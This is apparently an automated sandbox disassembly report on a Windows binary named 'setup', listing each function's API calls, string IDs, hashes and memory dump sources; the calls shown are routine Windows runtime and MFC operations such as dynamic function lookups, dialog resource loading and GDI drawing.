                                                                                                                          • Opcode ID: 75817f040b1de7da94727e10bd999e010610722df5f1c7d1b79c24bfe22f0bb0
                                                                                                                          • Instruction ID: 579e31a42b2dd4f58a97a61246160c8c4eca3cc01e02c0ffd00ea331c88b4b7b
                                                                                                                          • Opcode Fuzzy Hash: 75817f040b1de7da94727e10bd999e010610722df5f1c7d1b79c24bfe22f0bb0
                                                                                                                          • Instruction Fuzzy Hash: 2C217C70900216ABDF10EBA4CC9AAEF7778AF10700F104429F512B71D1DB749E49EF61
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1970E
                                                                                                                            • Part of subcall function 00C789DE: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,00C15E54,00000000,?,00000000), ref: 00C789F3
                                                                                                                            • Part of subcall function 00C789DE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C78A12
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C197A9
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,_permissiontest_,00000050), ref: 00C197B4
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,_permissiontest_,00000050), ref: 00C197BD
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,_permissiontest_,00000050), ref: 00C197CF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Time$CloseCreateDeallocateDeleteErrorH_prolog3_HandleLastSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: _permissiontest_
                                                                                                                          • API String ID: 1405794384-1367907562
                                                                                                                          • Opcode ID: d7767154e71a11e1eb43fc41e3bbbdd95049c30f0f52eaebfcc64a6f11db6492
                                                                                                                          • Instruction ID: 3eeb0ae4b1f72d1adb264e0f53330028f7fe06bc10a076ff76eb0c857e0a973b
                                                                                                                          • Opcode Fuzzy Hash: d7767154e71a11e1eb43fc41e3bbbdd95049c30f0f52eaebfcc64a6f11db6492
                                                                                                                          • Instruction Fuzzy Hash: 9C213D71D40208BEDB04EBF4DC5AADDB7B8AF15300F608555F211A61E2DF745A08E661
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,4641B5ED,?,00C842F1,?,?,00000000,?), ref: 00C842A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                          • Opcode ID: f17b3d5fa4d614922d1bad6e24b01ffdaf3c6d2d906b3f9bc57ac8a5ca195ae1
                                                                                                                          • Instruction ID: c3d96c87c79722aeb4fae552c7dd739f82143c2cc988609246880660ec589837
                                                                                                                          • Opcode Fuzzy Hash: f17b3d5fa4d614922d1bad6e24b01ffdaf3c6d2d906b3f9bc57ac8a5ca195ae1
                                                                                                                          • Instruction Fuzzy Hash: FE21E731A05226ABCB25AB65EC44F5F3B68AF427B8F150125FD25A72D1E730EE00C7D4
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 00C2E390
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C2E3AC
                                                                                                                          • MulDiv.KERNEL32(00000000), ref: 00C2E3B3
                                                                                                                          • DPtoLP.GDI32(00000000,?,00000001), ref: 00C2E3C8
                                                                                                                          • DPtoLP.GDI32(00000000,?,00000001), ref: 00C2E3DB
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00C2E3FB
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C2E405
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: f9505488fdd2e791b944bb9397ffc2ac5316ba018950dd70b131a393b8e8bc3c
                                                                                                                          • Instruction ID: e747f9fb901e6133b7e86022b7932ebd09428279516f432619bd30f860a48b9e
                                                                                                                          • Opcode Fuzzy Hash: f9505488fdd2e791b944bb9397ffc2ac5316ba018950dd70b131a393b8e8bc3c
                                                                                                                          • Instruction Fuzzy Hash: DB210771A04328AFDB10DFB4DC8DAAEBBB9FB08711F10411AF509EB291DB709944CB51
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,user32.dll), ref: 00C327F4
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 00C32806
                                                                                                                          • GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 00C32814
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
                                                                                                                          • API String ID: 667068680-2470269259
                                                                                                                          • Opcode ID: a5aa8e94d5682c3130f455225bcfdb6393b0095bba40f654ef1175aaac4adebf
                                                                                                                          • Instruction ID: 2058e5b139f63a341f1dd307110367050460343af8c2c109c2b3b4b8c47146b6
                                                                                                                          • Opcode Fuzzy Hash: a5aa8e94d5682c3130f455225bcfdb6393b0095bba40f654ef1175aaac4adebf
                                                                                                                          • Instruction Fuzzy Hash: 6B11E633610615AFCF001BA5DC4CB6DF768FF547A4F10003AF90593AA0CB71AC1186E2
                                                                                                                          APIs
                                                                                                                          • RealChildWindowFromPoint.USER32(?,?,?), ref: 00C3D6F2
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00C3D70C
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00C3D75E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ChildClientFromPointRealScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2518355518-0
                                                                                                                          • Opcode ID: dce516d693a81d392c986e7857637e0dbbdb61df69cf296b3cda9ad6ae702888
                                                                                                                          • Instruction ID: ea5d3a239c9034f3378c91be1c3f2b3166140f3f8c4fa3c0d1254679bf9ef06e
                                                                                                                          • Opcode Fuzzy Hash: dce516d693a81d392c986e7857637e0dbbdb61df69cf296b3cda9ad6ae702888
                                                                                                                          • Instruction Fuzzy Hash: 82118431911119ABCB11DFA8DC4CFEF77B9AF4A310F510125F502E3294EB349A458BA1
                                                                                                                          APIs
                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,00000000), ref: 00C205A1
                                                                                                                          • wsprintfW.USER32 ref: 00C205C7
                                                                                                                          • VerQueryValueW.VERSION(?,?,?,?), ref: 00C205E7
                                                                                                                          • lstrcpyW.KERNEL32(00C20519,?), ref: 00C205F8
                                                                                                                          Strings
                                                                                                                          • \VarFileInfo\Translation, xrefs: 00C2059A
                                                                                                                          • \StringFileInfo\%04x%04x\%s, xrefs: 00C205C1
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$lstrcpywsprintf
                                                                                                                          • String ID: \StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                                                                          • API String ID: 209441233-2466519063
                                                                                                                          • Opcode ID: 94730b0fbc43395114e983b95bba1d2ad4e0bcff754e62da93e9d8e86b13fb7b
                                                                                                                          • Instruction ID: 4bcd6010b0d7b43e18ce2dbb99ca1cc4e62d099ed5662103112982891a0a9281
                                                                                                                          • Opcode Fuzzy Hash: 94730b0fbc43395114e983b95bba1d2ad4e0bcff754e62da93e9d8e86b13fb7b
                                                                                                                          • Instruction Fuzzy Hash: C4116DB2600129AFCB209F65DC84BFBB7BDBF48701F1400B6B949D2551EF719A54DBA0
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C30C5B
                                                                                                                          • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 00C30C83
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00C30C95
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00C30CA1
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00C30CAC
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeofWindow
                                                                                                                          • String ID: AFX_DIALOG_LAYOUT
                                                                                                                          • API String ID: 2582447065-2436846380
                                                                                                                          • Opcode ID: a3c1b80af8811e94be247f8a9309a6bd94daecff1346aff2cc429a75d121adb5
                                                                                                                          • Instruction ID: 0efa2839e766da2f1a3a9de3d9be94710f6b10b8fba369e3cf468aa510dfa630
                                                                                                                          • Opcode Fuzzy Hash: a3c1b80af8811e94be247f8a9309a6bd94daecff1346aff2cc429a75d121adb5
                                                                                                                          • Instruction Fuzzy Hash: 96118E72620310AFDB119BB9EC4CB6E76ACFB44751F24122AF901D2261EA74DE40D761
                                                                                                                          APIs
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C261C1
                                                                                                                          • GetIconInfo.USER32(?,?), ref: 00C261E5
                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00C261F9
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C2620A
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C2620F
                                                                                                                          • IsWindow.USER32(?), ref: 00C26219
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00C26233
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$IconInfoInvalidateRectWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2140499309-0
                                                                                                                          • Opcode ID: 03989a20da529a71bcb4dbd022f7bebe0f286383fae040c82e2e04c3377a7e98
                                                                                                                          • Instruction ID: f8dd7f61a2f9c18b25b845055ae7935402e5b8f306270f48a77a0802fe1a5808
                                                                                                                          • Opcode Fuzzy Hash: 03989a20da529a71bcb4dbd022f7bebe0f286383fae040c82e2e04c3377a7e98
                                                                                                                          • Instruction Fuzzy Hash: C3119131640304EFDB215B78DC49B9F77E8AF51304F14042AE496A21A1DBB1E954DB61
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39D7C,?,?,?,?), ref: 00C40A73
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 00C40A83
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,00C39D7C,?,?,?,?), ref: 00C40A8C
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C39D7C,?,?,?,?), ref: 00C40A9A
                                                                                                                          Strings
                                                                                                                          • RegisterApplicationRecoveryCallback, xrefs: 00C40A7D
                                                                                                                          • kernel32.dll, xrefs: 00C40A6E
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                                                                          • API String ID: 2061474489-202725706
                                                                                                                          • Opcode ID: 46f98e101aaafdcf8d8c787a4f3c6941832d320c30aca6c4103f9693a0f06896
                                                                                                                          • Instruction ID: b1f584df20dc17ecdafe4583b8bb6cabc8ee7fd8bfe733ca3aa74085e1eeebeb
                                                                                                                          • Opcode Fuzzy Hash: 46f98e101aaafdcf8d8c787a4f3c6941832d320c30aca6c4103f9693a0f06896
                                                                                                                          • Instruction Fuzzy Hash: BAF0543564075ABF8F119F65EC0CB5D3FA9BB087903108021FE05E62A0DB34CD10AFA0
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 00C40C01
                                                                                                                          • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00C40C11
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C40C1A
                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00C40C28
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: TaskDialogIndirect$comctl32.dll
                                                                                                                          • API String ID: 2061474489-2809879075
                                                                                                                          • Opcode ID: f4df639ef8d494d9eae09d7f952e116398e2347b90d205c9c92782f5231e461a
                                                                                                                          • Instruction ID: 66a742dca3fc467008c246c9adf97936c79c4a36a40f16e72c67809d99cf0eb2
                                                                                                                          • Opcode Fuzzy Hash: f4df639ef8d494d9eae09d7f952e116398e2347b90d205c9c92782f5231e461a
                                                                                                                          • Instruction Fuzzy Hash: A3F03035580215FB8B111FA4ED8CB5E3E68BB087A17100625FE09E2270DB35CD109AA5
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C40B9C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00C40BAC
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C40BB5
                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00C40BC3
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                          • API String ID: 2061474489-2936008475
                                                                                                                          • Opcode ID: 676417eb88b9dbb82f72f519f231d7d20c878db88074216b7319826fb9597bae
                                                                                                                          • Instruction ID: 6f4f880073b75d4a390ee2e19517a765b3cc574d015c29fa4e4dc290752e0b69
                                                                                                                          • Opcode Fuzzy Hash: 676417eb88b9dbb82f72f519f231d7d20c878db88074216b7319826fb9597bae
                                                                                                                          • Instruction Fuzzy Hash: 55F03A35685215EB8F121F61ED0CF6E3AA8FB087997108026FE05E22A0DB34CD119BE8
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(shell32.dll,?,?,00C35E3E,?,00000000,00C99BB4,00C3610C), ref: 00C40B37
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00C40B47
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00C35E3E,?,00000000,00C99BB4,00C3610C), ref: 00C40B50
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,00C35E3E,?,00000000,00C99BB4,00C3610C), ref: 00C40B5E
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                          • API String ID: 2061474489-2320870614
                                                                                                                          • Opcode ID: ce092a74d628c2b7c5c17500e1b87d440a1ac78e5e750d217daa5b420e396dad
                                                                                                                          • Instruction ID: 0c254c53700d990ce587da19c6b27f911081af60f625cb82c116d9ae7516ef29
                                                                                                                          • Opcode Fuzzy Hash: ce092a74d628c2b7c5c17500e1b87d440a1ac78e5e750d217daa5b420e396dad
                                                                                                                          • Instruction Fuzzy Hash: 0FF03032580215FB8B111F65EC0CF5E3B68FB087A93104121FE01E2270DB30CE409AA8
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39D60,?,?), ref: 00C40AD8
• GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00C40AE8
• EncodePointer.KERNEL32(00000000,?,?,00C39D60,?,?), ref: 00C40AF1
• DecodePointer.KERNEL32(00000000,?,?,00C39D60,?,?), ref: 00C40AFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeHandleModuleProc
• String ID: RegisterApplicationRestart$kernel32.dll
• API String ID: 2061474489-1259503209
• Opcode ID: b422daea6aa32ec6980c2fccde813fd1edf2a4b8f179ae3d3c1f2b8cddee7ddc
• Instruction ID: 8b00c58f39652ffff06e33bcee53ecf7017573ed128a0275dfeb323e57d65ac3
• Opcode Fuzzy Hash: b422daea6aa32ec6980c2fccde813fd1edf2a4b8f179ae3d3c1f2b8cddee7ddc
• Instruction Fuzzy Hash: 18F01235680759BB8B115B65FC0CF5D7FA8FB047953104126FD05E6261DB34CD419AA4
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39510,00000000), ref: 00C40732
• GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 00C40742
• EncodePointer.KERNEL32(00000000,?,?,00C39510,00000000), ref: 00C4074B
• DecodePointer.KERNEL32(00000000,?,?,00C39510,00000000), ref: 00C40759
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeHandleModuleProc
• String ID: ApplicationRecoveryInProgress$kernel32.dll
• API String ID: 2061474489-2899047487
• Opcode ID: 8885d55924cbb106c8a345399bc984b6b366f10b50cc56b4ee73b14d77a8556d
• Instruction ID: 3c95671af2f3e5aa714982002772da76f6ea162b7e13ef04853ecc2c1ee61269
• Opcode Fuzzy Hash: 8885d55924cbb106c8a345399bc984b6b366f10b50cc56b4ee73b14d77a8556d
• Instruction Fuzzy Hash: 5BF06C35981761EF8B111B75BC4CB6D3B98BB087E63140526FE05E32A0DB74ED405EE5
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C39553,00000001), ref: 00C406DD
• GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 00C406ED
• EncodePointer.KERNEL32(00000000,?,00C39553,00000001), ref: 00C406F6
• DecodePointer.KERNEL32(00000000,?,?,00C39553,00000001), ref: 00C40704
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeHandleModuleProc
• String ID: ApplicationRecoveryFinished$kernel32.dll
• API String ID: 2061474489-1962646049
• Opcode ID: f33a21666743dc074741dd3a6735cdf5bf6376233cc6dc633fe7922152980cbe
• Instruction ID: 525cc779469fbad27577c4642f8592cef405d476ce22ec2ace061db3aead91ce
• Opcode Fuzzy Hash: f33a21666743dc074741dd3a6735cdf5bf6376233cc6dc633fe7922152980cbe
• Instruction Fuzzy Hash: 7CF06531641715AB8B112B74FD0CF1D7BACBB087953004122FD06E22A1DB34DE008EA2
APIs
• GetModuleHandleW.KERNEL32(shell32.dll,00000000,00C2F1FA), ref: 00C409D3
• GetProcAddress.KERNEL32(00000000,InitNetworkAddressControl), ref: 00C409E3
• EncodePointer.KERNEL32(00000000), ref: 00C409EC
• DecodePointer.KERNEL32(00000000,00000000,00C2F1FA), ref: 00C409FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeHandleModuleProc
• String ID: InitNetworkAddressControl$shell32.dll
• API String ID: 2061474489-1950653938
• Opcode ID: 261e07cdd626f23ae30ab7032326f0da69e8286d72dcf62fb34741105d848b0b
• Instruction ID: 72e2239b8ac4baa3c65f0c27f072a2dc94e6ccbc0372af89683507bb28cb77ce
• Opcode Fuzzy Hash: 261e07cdd626f23ae30ab7032326f0da69e8286d72dcf62fb34741105d848b0b
• Instruction Fuzzy Hash: 69E01231A41725AF9B116B70BC0CB5E3A58BB087953154567F901E21A6EB34CD019BA4
APIs
• GetModuleHandleW.KERNEL32(comctl32.dll), ref: 00C40A25
• GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00C40A35
• EncodePointer.KERNEL32(00000000), ref: 00C40A3E
• DecodePointer.KERNEL32(00000000), ref: 00C40A50
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeHandleModuleProc
• String ID: TaskDialogIndirect$comctl32.dll
• API String ID: 2061474489-2809879075
• Opcode ID: fa6125fdafbb6bc18e22d8f601f42c7df9f9a4295e856cc147cf1aee78583304
• Instruction ID: 2342c2d3d2fcbe792dcf61513fda187fb4c386a19bdc5c9687f70f850e4d31b8
• Opcode Fuzzy Hash: fa6125fdafbb6bc18e22d8f601f42c7df9f9a4295e856cc147cf1aee78583304
• Instruction Fuzzy Hash: FAE08675641761AF8B509B74BD0CB5E3AD8BF087E13118D72FD05E31A0EB38DD00A6A4
APIs
• GetSysColor.USER32(0000000F), ref: 00C3DE9F
• GetSysColor.USER32(00000010), ref: 00C3DEAA
• GetSysColor.USER32(00000014), ref: 00C3DEB5
• GetSysColor.USER32(00000012), ref: 00C3DEC0
• GetSysColor.USER32(00000006), ref: 00C3DECB
• GetSysColorBrush.USER32(0000000F), ref: 00C3DED6
• GetSysColorBrush.USER32(00000006), ref: 00C3DEE1
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
